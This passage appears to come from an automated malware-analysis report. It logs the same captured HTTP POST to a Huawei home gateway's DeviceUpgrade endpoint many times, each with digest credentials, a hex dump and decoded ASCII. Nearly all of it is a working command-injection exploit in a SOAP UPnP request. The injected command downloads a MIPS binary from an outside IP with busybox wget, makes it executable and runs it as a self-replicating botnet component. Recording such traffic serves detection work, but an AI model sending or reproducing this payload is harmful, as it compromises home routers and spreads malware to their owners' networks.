xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 